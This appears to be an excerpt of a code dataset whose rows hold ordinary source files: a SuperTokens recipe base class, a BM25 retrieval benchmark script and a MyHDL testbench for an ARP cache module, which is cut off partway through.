from supertokens_python.framework.request import BaseRequest
from .supertokens import AppInfo
from .normalised_url_path import NormalisedURLPath
from .exceptions import SuperTokensError
class RecipeModule(abc.ABC):
def __init__(self, recipe_id: str, app_info: AppInfo):
self.recipe_id = recipe_id
self.app_info = app_info
def get_recipe_id(self):
return self.recipe_id
def get_app_info(self):
return self.app_info
def return_api_id_if_can_handle_request(
self, path: NormalisedURLPath, method: str) -> Union[str, None]:
apis_handled = self.get_apis_handled()
for current_api in apis_handled:
if not current_api.disabled and current_api.method == method and self.app_info.api_base_path.append(
current_api.path_without_api_base_path).equals(path):
return current_api.request_id
return None
@abc.abstractmethod
def is_error_from_this_recipe_based_on_instance(self, err):
pass
@abc.abstractmethod
def get_apis_handled(self) -> List[APIHandled]:
pass
@abc.abstractmethod
async def handle_api_request(self, request_id: str, request: BaseRequest, path: NormalisedURLPath, method: str,
response: BaseResponse):
pass
@abc.abstractmethod
async def handle_error(self, request: BaseRequest, err: SuperTokensError, response: BaseResponse):
pass
@abc.abstractmethod
def get_all_cors_headers(self):
pass
class APIHandled:
def __init__(self, path_without_api_base_path: NormalisedURLPath,
method: Literal['post', 'get', 'delete', 'put', 'options', 'trace'], request_id: str, disabled: bool):
self.path_without_api_base_path = path_without_api_base_path
self.method = method
self.request_id = request_id
self.disabled = disabled
| en | 0.896635 | # Copyright (c) 2021, VRAI Labs and/or its affiliates. All rights reserved. # # This software is licensed under the Apache License, Version 2.0 (the # "License") as published by the Apache Software Foundation. # # You may not use this file except in compliance with the License. You may # obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. | 1.94416 | 2 |
tests/__init__.py | mihaidumitrescu/flake8-html | 36 | 8545 | <filename>tests/__init__.py
# -*- coding: utf-8 -*-
"""Tests go in this directory."""
| <filename>tests/__init__.py
# -*- coding: utf-8 -*-
"""Tests go in this directory."""
| en | 0.908211 | # -*- coding: utf-8 -*- Tests go in this directory. | 1.11441 | 1 |
datajoint-workflow/{{cookiecutter.github_repo}}/src/{{cookiecutter.__pkg_import_name}}/version.py | Yambottle/dj-workflow-template | 0 | 8546 | __version__ = "{{cookiecutter._pkg_version}}"
| __version__ = "{{cookiecutter._pkg_version}}"
| none | 1 | 1.156341 | 1 |
|
examples/benchmarking/benchmark_bm25.py | shibing624/similarities | 16 | 8547 | <gh_stars>10-100
# -*- coding: utf-8 -*-
"""
@author:XuMing(<EMAIL>)
@description:
"""
import datetime
import os
import pathlib
import random
import sys
from loguru import logger
sys.path.append('../..')
from similarities import BM25Similarity
from similarities.utils import http_get
from similarities.data_loader import SearchDataLoader
from similarities.evaluation import evaluate
random.seed(42)
pwd_path = os.path.dirname(os.path.realpath(__file__))
def get_scifact():
# Download scifact.zip dataset and unzip the dataset
dataset = "scifact"
url = "https://public.ukp.informatik.tu-darmstadt.de/thakur/BEIR/datasets/{}.zip".format(dataset)
zip_file = os.path.join(pwd_path, "scifact.zip")
if not os.path.exists(zip_file):
logger.info("Dataset not exists, downloading...")
http_get(url, zip_file, extract=True)
else:
logger.info("Dataset already exists, skipping download.")
data_path = os.path.join(pwd_path, dataset)
return data_path
def get_dbpedia():
dataset = "dbpedia-entity"
url = "https://public.ukp.informatik.tu-darmstadt.de/thakur/BEIR/datasets/{}.zip".format(dataset)
zip_file = os.path.join(pwd_path, "dbpedia-entity.zip")
if not os.path.exists(zip_file):
logger.info("Dataset not exists, downloading...")
http_get(url, zip_file, extract=True)
else:
logger.info("Dataset already exists, skipping download.")
data_path = os.path.join(pwd_path, dataset)
return data_path
data_path = get_scifact()
#### Loading test queries and corpus in DBPedia
corpus, queries, qrels = SearchDataLoader(data_path).load(split="test")
corpus_ids, query_ids = list(corpus), list(queries)
logger.info(f"corpus: {len(corpus)}, queries: {len(queries)}")
#### Randomly sample 1M pairs from Original Corpus (4.63M pairs)
#### First include all relevant documents (i.e. present in qrels)
corpus_set = set()
for query_id in qrels:
corpus_set.update(list(qrels[query_id].keys()))
corpus_new = {corpus_id: corpus[corpus_id] for corpus_id in corpus_set}
#### Remove already seen k relevant documents and sample (1M - k) docs randomly
remaining_corpus = list(set(corpus_ids) - corpus_set)
sample = min(1000000 - len(corpus_set), len(remaining_corpus))
# sample = 10
for corpus_id in random.sample(remaining_corpus, sample):
corpus_new[corpus_id] = corpus[corpus_id]
corpus_docs = {corpus_id: corpus_new[corpus_id]['title'] + corpus_new[corpus_id]['text'] for corpus_id, corpus in
corpus_new.items()}
#### Index 1M passages into the index (seperately)
model = BM25Similarity(corpus_docs)
#### Saving benchmark times
time_taken_all = {}
for query_id in query_ids:
query = {query_id: queries[query_id]}
#### Measure time to retrieve top-10 BM25 documents using single query latency
start = datetime.datetime.now()
q_res = model.most_similar(query, topn=10)
end = datetime.datetime.now()
# print(q_res)
#### Measuring time taken in ms (milliseconds)
time_taken = (end - start)
time_taken = time_taken.total_seconds() * 1000
time_taken_all[query_id] = time_taken
# logger.info("query: {}: {} {:.2f}ms".format(query_id, query, time_taken))
# logger.info("\tsearch result: {}".format(results[:2]))
time_taken = list(time_taken_all.values())
logger.info("Average time taken: {:.2f}ms".format(sum(time_taken) / len(time_taken_all)))
#### Saving benchmark times with batch
# queries = [queries[query_id] for query_id in query_ids]
start = datetime.datetime.now()
results = model.most_similar(queries, topn=10)
end = datetime.datetime.now()
#### Measuring time taken in ms (milliseconds)
time_taken = (end - start)
time_taken = time_taken.total_seconds() * 1000
logger.info("All, Spend {:.2f}ms".format(time_taken))
logger.info("Average time taken: {:.2f}ms".format(time_taken / len(queries)))
logger.info(f"Results size: {len(results)}")
#### Evaluate your retrieval using NDCG@k, MAP@K ...
ndcg, _map, recall, precision = evaluate(qrels, results)
logger.info(f"MAP: {_map}")
| # -*- coding: utf-8 -*-
"""
@author:XuMing(<EMAIL>)
@description:
"""
import datetime
import os
import pathlib
import random
import sys
from loguru import logger
sys.path.append('../..')
from similarities import BM25Similarity
from similarities.utils import http_get
from similarities.data_loader import SearchDataLoader
from similarities.evaluation import evaluate
random.seed(42)
pwd_path = os.path.dirname(os.path.realpath(__file__))
def get_scifact():
# Download scifact.zip dataset and unzip the dataset
dataset = "scifact"
url = "https://public.ukp.informatik.tu-darmstadt.de/thakur/BEIR/datasets/{}.zip".format(dataset)
zip_file = os.path.join(pwd_path, "scifact.zip")
if not os.path.exists(zip_file):
logger.info("Dataset not exists, downloading...")
http_get(url, zip_file, extract=True)
else:
logger.info("Dataset already exists, skipping download.")
data_path = os.path.join(pwd_path, dataset)
return data_path
def get_dbpedia():
dataset = "dbpedia-entity"
url = "https://public.ukp.informatik.tu-darmstadt.de/thakur/BEIR/datasets/{}.zip".format(dataset)
zip_file = os.path.join(pwd_path, "dbpedia-entity.zip")
if not os.path.exists(zip_file):
logger.info("Dataset not exists, downloading...")
http_get(url, zip_file, extract=True)
else:
logger.info("Dataset already exists, skipping download.")
data_path = os.path.join(pwd_path, dataset)
return data_path
data_path = get_scifact()
#### Loading test queries and corpus in DBPedia
corpus, queries, qrels = SearchDataLoader(data_path).load(split="test")
corpus_ids, query_ids = list(corpus), list(queries)
logger.info(f"corpus: {len(corpus)}, queries: {len(queries)}")
#### Randomly sample 1M pairs from Original Corpus (4.63M pairs)
#### First include all relevant documents (i.e. present in qrels)
corpus_set = set()
for query_id in qrels:
corpus_set.update(list(qrels[query_id].keys()))
corpus_new = {corpus_id: corpus[corpus_id] for corpus_id in corpus_set}
#### Remove already seen k relevant documents and sample (1M - k) docs randomly
remaining_corpus = list(set(corpus_ids) - corpus_set)
sample = min(1000000 - len(corpus_set), len(remaining_corpus))
# sample = 10
for corpus_id in random.sample(remaining_corpus, sample):
corpus_new[corpus_id] = corpus[corpus_id]
corpus_docs = {corpus_id: corpus_new[corpus_id]['title'] + corpus_new[corpus_id]['text'] for corpus_id, corpus in
corpus_new.items()}
#### Index 1M passages into the index (seperately)
model = BM25Similarity(corpus_docs)
#### Saving benchmark times
time_taken_all = {}
for query_id in query_ids:
query = {query_id: queries[query_id]}
#### Measure time to retrieve top-10 BM25 documents using single query latency
start = datetime.datetime.now()
q_res = model.most_similar(query, topn=10)
end = datetime.datetime.now()
# print(q_res)
#### Measuring time taken in ms (milliseconds)
time_taken = (end - start)
time_taken = time_taken.total_seconds() * 1000
time_taken_all[query_id] = time_taken
# logger.info("query: {}: {} {:.2f}ms".format(query_id, query, time_taken))
# logger.info("\tsearch result: {}".format(results[:2]))
time_taken = list(time_taken_all.values())
logger.info("Average time taken: {:.2f}ms".format(sum(time_taken) / len(time_taken_all)))
#### Saving benchmark times with batch
# queries = [queries[query_id] for query_id in query_ids]
start = datetime.datetime.now()
results = model.most_similar(queries, topn=10)
end = datetime.datetime.now()
#### Measuring time taken in ms (milliseconds)
time_taken = (end - start)
time_taken = time_taken.total_seconds() * 1000
logger.info("All, Spend {:.2f}ms".format(time_taken))
logger.info("Average time taken: {:.2f}ms".format(time_taken / len(queries)))
logger.info(f"Results size: {len(results)}")
#### Evaluate your retrieval using NDCG@k, MAP@K ...
ndcg, _map, recall, precision = evaluate(qrels, results)
logger.info(f"MAP: {_map}") | en | 0.62628 | # -*- coding: utf-8 -*- @author:XuMing(<EMAIL>) @description: # Download scifact.zip dataset and unzip the dataset #### Loading test queries and corpus in DBPedia #### Randomly sample 1M pairs from Original Corpus (4.63M pairs) #### First include all relevant documents (i.e. present in qrels) #### Remove already seen k relevant documents and sample (1M - k) docs randomly # sample = 10 #### Index 1M passages into the index (seperately) #### Saving benchmark times #### Measure time to retrieve top-10 BM25 documents using single query latency # print(q_res) #### Measuring time taken in ms (milliseconds) # logger.info("query: {}: {} {:.2f}ms".format(query_id, query, time_taken)) # logger.info("\tsearch result: {}".format(results[:2])) #### Saving benchmark times with batch # queries = [queries[query_id] for query_id in query_ids] #### Measuring time taken in ms (milliseconds) #### Evaluate your retrieval using NDCG@k, MAP@K ... | 2.391567 | 2 |
tb/test_arp_64.py | sergachev/verilog-ethernet | 2 | 8548 | <reponame>sergachev/verilog-ethernet
#!/usr/bin/env python
"""
Copyright (c) 2014-2018 <NAME>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
from myhdl import *
import os
import axis_ep
import eth_ep
import arp_ep
module = 'arp_64'
testbench = 'test_%s' % module
srcs = []
srcs.append("../rtl/%s.v" % module)
srcs.append("../rtl/lfsr.v")
srcs.append("../rtl/arp_cache.v")
srcs.append("../rtl/arp_eth_rx_64.v")
srcs.append("../rtl/arp_eth_tx_64.v")
srcs.append("%s.v" % testbench)
src = ' '.join(srcs)
build_cmd = "iverilog -o %s.vvp %s" % (testbench, src)
def bench():
# Inputs
clk = Signal(bool(0))
rst = Signal(bool(0))
current_test = Signal(intbv(0)[8:])
s_eth_hdr_valid = Signal(bool(0))
s_eth_dest_mac = Signal(intbv(0)[48:])
s_eth_src_mac = Signal(intbv(0)[48:])
s_eth_type = Signal(intbv(0)[16:])
s_eth_payload_axis_tdata = Signal(intbv(0)[64:])
s_eth_payload_axis_tkeep = Signal(intbv(0)[8:])
s_eth_payload_axis_tvalid = Signal(bool(0))
s_eth_payload_axis_tlast = Signal(bool(0))
s_eth_payload_axis_tuser = Signal(bool(0))
m_eth_payload_axis_tready = Signal(bool(0))
m_eth_hdr_ready = Signal(bool(0))
arp_request_valid = Signal(bool(0))
arp_request_ip = Signal(intbv(0)[32:])
arp_response_ready = Signal(bool(0))
local_mac = Signal(intbv(0)[48:])
local_ip = Signal(intbv(0)[32:])
gateway_ip = Signal(intbv(0)[32:])
subnet_mask = Signal(intbv(0)[32:])
clear_cache = Signal(bool(0))
# Outputs
s_eth_hdr_ready = Signal(bool(0))
s_eth_payload_axis_tready = Signal(bool(0))
m_eth_hdr_valid = Signal(bool(0))
m_eth_dest_mac = Signal(intbv(0)[48:])
m_eth_src_mac = Signal(intbv(0)[48:])
m_eth_type = Signal(intbv(0)[16:])
m_eth_payload_axis_tdata = Signal(intbv(0)[64:])
m_eth_payload_axis_tkeep = Signal(intbv(0)[8:])
m_eth_payload_axis_tvalid = Signal(bool(0))
m_eth_payload_axis_tlast = Signal(bool(0))
m_eth_payload_axis_tuser = Signal(bool(0))
arp_request_ready = Signal(bool(0))
arp_response_valid = Signal(bool(0))
arp_response_error = Signal(bool(0))
arp_response_mac = Signal(intbv(0)[48:])
# sources and sinks
eth_source_pause = Signal(bool(0))
eth_sink_pause = Signal(bool(0))
eth_source = eth_ep.EthFrameSource()
eth_source_logic = eth_source.create_logic(
clk,
rst,
eth_hdr_ready=s_eth_hdr_ready,
eth_hdr_valid=s_eth_hdr_valid,
eth_dest_mac=s_eth_dest_mac,
eth_src_mac=s_eth_src_mac,
eth_type=s_eth_type,
eth_payload_tdata=s_eth_payload_axis_tdata,
eth_payload_tkeep=s_eth_payload_axis_tkeep,
eth_payload_tvalid=s_eth_payload_axis_tvalid,
eth_payload_tready=s_eth_payload_axis_tready,
eth_payload_tlast=s_eth_payload_axis_tlast,
eth_payload_tuser=s_eth_payload_axis_tuser,
pause=eth_source_pause,
name='eth_source'
)
eth_sink = eth_ep.EthFrameSink()
eth_sink_logic = eth_sink.create_logic(
clk,
rst,
eth_hdr_ready=m_eth_hdr_ready,
eth_hdr_valid=m_eth_hdr_valid,
eth_dest_mac=m_eth_dest_mac,
eth_src_mac=m_eth_src_mac,
eth_type=m_eth_type,
eth_payload_tdata=m_eth_payload_axis_tdata,
eth_payload_tkeep=m_eth_payload_axis_tkeep,
eth_payload_tvalid=m_eth_payload_axis_tvalid,
eth_payload_tready=m_eth_payload_axis_tready,
eth_payload_tlast=m_eth_payload_axis_tlast,
eth_payload_tuser=m_eth_payload_axis_tuser,
pause=eth_sink_pause,
name='eth_sink'
)
arp_request_source = axis_ep.AXIStreamSource()
arp_request_source_logic = arp_request_source.create_logic(
clk,
rst,
tdata=(arp_request_ip,),
tvalid=arp_request_valid,
tready=arp_request_ready,
name='arp_request_source'
)
arp_response_sink = axis_ep.AXIStreamSink()
arp_response_sink_logic = arp_response_sink.create_logic(
clk,
rst,
tdata=(arp_response_error, arp_response_mac),
tvalid=arp_response_valid,
tready=arp_response_ready,
name='arp_response_sink'
)
# DUT
if os.system(build_cmd):
raise Exception("Error running build command")
dut = Cosimulation(
"vvp -m myhdl %s.vvp -lxt2" % testbench,
clk=clk,
rst=rst,
current_test=current_test,
s_eth_hdr_valid=s_eth_hdr_valid,
s_eth_hdr_ready=s_eth_hdr_ready,
s_eth_dest_mac=s_eth_dest_mac,
s_eth_src_mac=s_eth_src_mac,
s_eth_type=s_eth_type,
s_eth_payload_axis_tdata=s_eth_payload_axis_tdata,
s_eth_payload_axis_tkeep=s_eth_payload_axis_tkeep,
s_eth_payload_axis_tvalid=s_eth_payload_axis_tvalid,
s_eth_payload_axis_tready=s_eth_payload_axis_tready,
s_eth_payload_axis_tlast=s_eth_payload_axis_tlast,
s_eth_payload_axis_tuser=s_eth_payload_axis_tuser,
m_eth_hdr_valid=m_eth_hdr_valid,
m_eth_hdr_ready=m_eth_hdr_ready,
m_eth_dest_mac=m_eth_dest_mac,
m_eth_src_mac=m_eth_src_mac,
m_eth_type=m_eth_type,
m_eth_payload_axis_tdata=m_eth_payload_axis_tdata,
m_eth_payload_axis_tkeep=m_eth_payload_axis_tkeep,
m_eth_payload_axis_tvalid=m_eth_payload_axis_tvalid,
m_eth_payload_axis_tready=m_eth_payload_axis_tready,
m_eth_payload_axis_tlast=m_eth_payload_axis_tlast,
m_eth_payload_axis_tuser=m_eth_payload_axis_tuser,
arp_request_valid=arp_request_valid,
arp_request_ready=arp_request_ready,
arp_request_ip=arp_request_ip,
arp_response_valid=arp_response_valid,
arp_response_ready=arp_response_ready,
arp_response_error=arp_response_error,
arp_response_mac=arp_response_mac,
local_mac=local_mac,
local_ip=local_ip,
gateway_ip=gateway_ip,
subnet_mask=subnet_mask,
clear_cache=clear_cache
)
@always(delay(4))
def clkgen():
clk.next = not clk
@instance
def check():
yield delay(100)
yield clk.posedge
rst.next = 1
yield clk.posedge
rst.next = 0
yield clk.posedge
yield delay(100)
yield clk.posedge
yield clk.posedge
local_mac.next = 0xDAD1D2D3D4D5
local_ip.next = 0xc0a80165
gateway_ip.next = 0xc0a80101
subnet_mask.next = 0xFFFFFF00
yield clk.posedge
print("test 1: ARP request")
current_test.next = 1
test_frame = arp_ep.ARPFrame()
test_frame.eth_dest_mac = 0xFFFFFFFFFFFF
test_frame.eth_src_mac = 0x5A5152535455
test_frame.eth_type = 0x0806
test_frame.arp_htype = 0x0001
test_frame.arp_ptype = 0x0800
test_frame.arp_hlen = 6
test_frame.arp_plen = 4
test_frame.arp_oper = 1
test_frame.arp_sha = 0x5A5152535455
test_frame.arp_spa = 0xc0a80164
test_frame.arp_tha = 0x000000000000
test_frame.arp_tpa = 0xc0a80165
eth_source.send(test_frame.build_eth())
yield eth_sink.wait()
rx_frame = eth_sink.recv()
check_frame = arp_ep.ARPFrame()
check_frame.parse_eth(rx_frame)
assert check_frame.eth_dest_mac == 0x5A5152535455
assert check_frame.eth_src_mac == 0xDAD1D2D3D4D5
assert check_frame.eth_type == 0x0806
assert check_frame.arp_htype == 0x0001
assert check_frame.arp_ptype == 0x0800
assert check_frame.arp_hlen == 6
assert check_frame.arp_plen == 4
assert check_frame.arp_oper == 2
assert check_frame.arp_sha == 0xDAD1D2D3D4D5
assert check_frame.arp_spa == 0xc0a80165
assert check_frame.arp_tha == 0x5A5152535455
assert check_frame.arp_tpa == 0xc0a80164
yield delay(100)
yield clk.posedge
print("test 2: Cached read")
current_test.next = 2
arp_request_source.send([(0xc0a80164,)])
yield arp_response_sink.wait()
err, mac = arp_response_sink.recv().data[0]
assert not err
assert mac == 0x5A5152535455
yield delay(100)
yield clk.posedge
print("test 3: Unached read")
current_test.next = 3
arp_request_source.send([(0xc0a80166,)])
# wait for ARP request packet
yield eth_sink.wait()
rx_frame = eth_sink.recv()
check_frame = arp_ep.ARPFrame()
check_frame.parse_eth(rx_frame)
assert check_frame.eth_dest_mac == 0xFFFFFFFFFFFF
assert check_frame.eth_src_mac == 0xDAD1D2D3D4D5
assert check_frame.eth_type == 0x0806
assert check_frame.arp_htype == 0x0001
assert check_frame.arp_ptype == 0x0800
assert check_frame.arp_hlen == 6
assert check_frame.arp_plen == 4
assert check_frame.arp_oper == 1
assert check_frame.arp_sha == 0xDAD1D2D3D4D5
assert check_frame.arp_spa == 0xc0a80165
assert check_frame.arp_tha == 0x000000000000
assert check_frame.arp_tpa == 0xc0a80166
# generate response
test_frame = arp_ep.ARPFrame()
test_frame.eth_dest_mac = 0xDAD1D2D3D4D5
test_frame.eth_src_mac = 0x6A6162636465
test_frame.eth_type = 0x0806
test_frame.arp_htype = 0x0001
test_frame.arp_ptype = 0x0800
test_frame.arp_hlen = 6
test_frame.arp_plen = 4
test_frame.arp_oper = 2
test_frame.arp_sha = 0x6A6162636465
test_frame.arp_spa = 0xc0a80166
test_frame.arp_tha = 0xDAD1D2D3D4D5
test_frame.arp_tpa = 0xc0a80165
eth_source.send(test_frame.build_eth())
# wait for lookup
yield arp_response_sink.wait()
err, mac = arp_response_sink.recv().data[0]
assert not err
assert mac == 0x6A6162636465
yield delay(100)
yield clk.posedge
print("test 4: Unached read, outside of subnet")
current_test.next = 4
arp_request_source.send([(0x08080808,)])
# wait for ARP request packet
yield eth_sink.wait()
rx_frame = eth_sink.recv()
check_frame = arp_ep.ARPFrame()
check_frame.parse_eth(rx_frame)
assert check_frame.eth_dest_mac == 0xFFFFFFFFFFFF
assert check_frame.eth_src_mac == 0xDAD1D2D3D4D5
assert check_frame.eth_type == 0x0806
assert check_frame.arp_htype == 0x0001
assert check_frame.arp_ptype == 0x0800
assert check_frame.arp_hlen == 6
assert check_frame.arp_plen == 4
assert check_frame.arp_oper == 1
assert check_frame.arp_sha == 0xDAD1D2D3D4D5
assert check_frame.arp_spa == 0xc0a80165
assert check_frame.arp_tha == 0x000000000000
assert check_frame.arp_tpa == 0xc0a80101
# generate response
test_frame = arp_ep.ARPFrame()
test_frame.eth_dest_mac = 0xDAD1D2D3D4D5
test_frame.eth_src_mac = 0xAABBCCDDEEFF
test_frame.eth_type = 0x0806
test_frame.arp_htype = 0x0001
test_frame.arp_ptype = 0x0800
test_frame.arp_hlen = 6
test_frame.arp_plen = 4
test_frame.arp_oper = 2
test_frame.arp_sha = 0xAABBCCDDEEFF
test_frame.arp_spa = 0xc0a80101
test_frame.arp_tha = 0xDAD1D2D3D4D5
test_frame.arp_tpa = 0xc0a80165
eth_source.send(test_frame.build_eth())
# wait for lookup
yield arp_response_sink.wait()
err, mac = arp_response_sink.recv().data[0]
assert not err
assert mac == 0xAABBCCDDEEFF
yield delay(100)
yield clk.posedge
print("test 5: Unached read, timeout")
current_test.next = 5
arp_request_source.send([(0xc0a80167,)])
yield arp_response_sink.wait()
err, mac = arp_response_sink.recv().data[0]
assert err
# check for 4 ARP requests
assert eth_sink.count() == 4
while not eth_sink.empty():
rx_frame = eth_sink.recv()
check_frame = arp_ep.ARPFrame()
check_frame.parse_eth(rx_frame)
assert check_frame.eth_dest_mac == 0xFFFFFFFFFFFF
assert check_frame.eth_src_mac == 0xDAD1D2D3D4D5
assert check_frame.eth_type == 0x0806
assert check_frame.arp_htype == 0x0001
assert check_frame.arp_ptype == 0x0800
assert check_frame.arp_hlen == 6
assert check_frame.arp_plen == 4
assert check_frame.arp_oper == 1
assert check_frame.arp_sha == 0xDAD1D2D3D4D5
assert check_frame.arp_spa == 0xc0a80165
assert check_frame.arp_tha == 0x000000000000
assert check_frame.arp_tpa == 0xc0a80167
yield delay(100)
yield clk.posedge
print("test 6: Broadcast")
current_test.next = 6
# subnet broadcast
arp_request_source.send([(0xc0a801ff,)])
yield arp_response_sink.wait()
err, mac = arp_response_sink.recv().data[0]
assert not err
assert mac == 0xffffffffffff
# general broadcast
arp_request_source.send([(0xffffffff,)])
yield arp_response_sink.wait()
err, mac = arp_response_sink.recv().data[0]
assert not err
assert mac == 0xffffffffffff
yield delay(100)
raise StopSimulation
return instances()
def test_bench():
sim = Simulation(bench())
sim.run()
if __name__ == '__main__':
print("Running test...")
test_bench()
| #!/usr/bin/env python
"""
Copyright (c) 2014-2018 <NAME>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
from myhdl import *
import os
import axis_ep
import eth_ep
import arp_ep
module = 'arp_64'
testbench = 'test_%s' % module
srcs = []
srcs.append("../rtl/%s.v" % module)
srcs.append("../rtl/lfsr.v")
srcs.append("../rtl/arp_cache.v")
srcs.append("../rtl/arp_eth_rx_64.v")
srcs.append("../rtl/arp_eth_tx_64.v")
srcs.append("%s.v" % testbench)
src = ' '.join(srcs)
build_cmd = "iverilog -o %s.vvp %s" % (testbench, src)
def bench():
# Inputs
clk = Signal(bool(0))
rst = Signal(bool(0))
current_test = Signal(intbv(0)[8:])
s_eth_hdr_valid = Signal(bool(0))
s_eth_dest_mac = Signal(intbv(0)[48:])
s_eth_src_mac = Signal(intbv(0)[48:])
s_eth_type = Signal(intbv(0)[16:])
s_eth_payload_axis_tdata = Signal(intbv(0)[64:])
s_eth_payload_axis_tkeep = Signal(intbv(0)[8:])
s_eth_payload_axis_tvalid = Signal(bool(0))
s_eth_payload_axis_tlast = Signal(bool(0))
s_eth_payload_axis_tuser = Signal(bool(0))
m_eth_payload_axis_tready = Signal(bool(0))
m_eth_hdr_ready = Signal(bool(0))
arp_request_valid = Signal(bool(0))
arp_request_ip = Signal(intbv(0)[32:])
arp_response_ready = Signal(bool(0))
local_mac = Signal(intbv(0)[48:])
local_ip = Signal(intbv(0)[32:])
gateway_ip = Signal(intbv(0)[32:])
subnet_mask = Signal(intbv(0)[32:])
clear_cache = Signal(bool(0))
# Outputs
s_eth_hdr_ready = Signal(bool(0))
s_eth_payload_axis_tready = Signal(bool(0))
m_eth_hdr_valid = Signal(bool(0))
m_eth_dest_mac = Signal(intbv(0)[48:])
m_eth_src_mac = Signal(intbv(0)[48:])
m_eth_type = Signal(intbv(0)[16:])
m_eth_payload_axis_tdata = Signal(intbv(0)[64:])
m_eth_payload_axis_tkeep = Signal(intbv(0)[8:])
m_eth_payload_axis_tvalid = Signal(bool(0))
m_eth_payload_axis_tlast = Signal(bool(0))
m_eth_payload_axis_tuser = Signal(bool(0))
arp_request_ready = Signal(bool(0))
arp_response_valid = Signal(bool(0))
arp_response_error = Signal(bool(0))
arp_response_mac = Signal(intbv(0)[48:])
# sources and sinks
eth_source_pause = Signal(bool(0))
eth_sink_pause = Signal(bool(0))
eth_source = eth_ep.EthFrameSource()
eth_source_logic = eth_source.create_logic(
clk,
rst,
eth_hdr_ready=s_eth_hdr_ready,
eth_hdr_valid=s_eth_hdr_valid,
eth_dest_mac=s_eth_dest_mac,
eth_src_mac=s_eth_src_mac,
eth_type=s_eth_type,
eth_payload_tdata=s_eth_payload_axis_tdata,
eth_payload_tkeep=s_eth_payload_axis_tkeep,
eth_payload_tvalid=s_eth_payload_axis_tvalid,
eth_payload_tready=s_eth_payload_axis_tready,
eth_payload_tlast=s_eth_payload_axis_tlast,
eth_payload_tuser=s_eth_payload_axis_tuser,
pause=eth_source_pause,
name='eth_source'
)
eth_sink = eth_ep.EthFrameSink()
eth_sink_logic = eth_sink.create_logic(
clk,
rst,
eth_hdr_ready=m_eth_hdr_ready,
eth_hdr_valid=m_eth_hdr_valid,
eth_dest_mac=m_eth_dest_mac,
eth_src_mac=m_eth_src_mac,
eth_type=m_eth_type,
eth_payload_tdata=m_eth_payload_axis_tdata,
eth_payload_tkeep=m_eth_payload_axis_tkeep,
eth_payload_tvalid=m_eth_payload_axis_tvalid,
eth_payload_tready=m_eth_payload_axis_tready,
eth_payload_tlast=m_eth_payload_axis_tlast,
eth_payload_tuser=m_eth_payload_axis_tuser,
pause=eth_sink_pause,
name='eth_sink'
)
arp_request_source = axis_ep.AXIStreamSource()
arp_request_source_logic = arp_request_source.create_logic(
clk,
rst,
tdata=(arp_request_ip,),
tvalid=arp_request_valid,
tready=arp_request_ready,
name='arp_request_source'
)
arp_response_sink = axis_ep.AXIStreamSink()
arp_response_sink_logic = arp_response_sink.create_logic(
clk,
rst,
tdata=(arp_response_error, arp_response_mac),
tvalid=arp_response_valid,
tready=arp_response_ready,
name='arp_response_sink'
)
# DUT
if os.system(build_cmd):
raise Exception("Error running build command")
dut = Cosimulation(
"vvp -m myhdl %s.vvp -lxt2" % testbench,
clk=clk,
rst=rst,
current_test=current_test,
s_eth_hdr_valid=s_eth_hdr_valid,
s_eth_hdr_ready=s_eth_hdr_ready,
s_eth_dest_mac=s_eth_dest_mac,
s_eth_src_mac=s_eth_src_mac,
s_eth_type=s_eth_type,
s_eth_payload_axis_tdata=s_eth_payload_axis_tdata,
s_eth_payload_axis_tkeep=s_eth_payload_axis_tkeep,
s_eth_payload_axis_tvalid=s_eth_payload_axis_tvalid,
s_eth_payload_axis_tready=s_eth_payload_axis_tready,
s_eth_payload_axis_tlast=s_eth_payload_axis_tlast,
s_eth_payload_axis_tuser=s_eth_payload_axis_tuser,
m_eth_hdr_valid=m_eth_hdr_valid,
m_eth_hdr_ready=m_eth_hdr_ready,
m_eth_dest_mac=m_eth_dest_mac,
m_eth_src_mac=m_eth_src_mac,
m_eth_type=m_eth_type,
m_eth_payload_axis_tdata=m_eth_payload_axis_tdata,
m_eth_payload_axis_tkeep=m_eth_payload_axis_tkeep,
m_eth_payload_axis_tvalid=m_eth_payload_axis_tvalid,
m_eth_payload_axis_tready=m_eth_payload_axis_tready,
m_eth_payload_axis_tlast=m_eth_payload_axis_tlast,
m_eth_payload_axis_tuser=m_eth_payload_axis_tuser,
arp_request_valid=arp_request_valid,
arp_request_ready=arp_request_ready,
arp_request_ip=arp_request_ip,
arp_response_valid=arp_response_valid,
arp_response_ready=arp_response_ready,
